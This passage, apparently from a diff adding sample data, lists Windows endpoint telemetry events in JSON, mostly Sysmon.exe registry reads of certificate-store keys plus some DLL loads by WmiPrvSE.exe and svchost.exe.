"Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmitomi.dll", + "image_path": "C:\\Windows\\System32\\wmitomi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573790740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573790740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NetTCPIP.dll", + "image_path": "C:\\Windows\\System32\\wbem\\NetTCPIP.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573790740000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 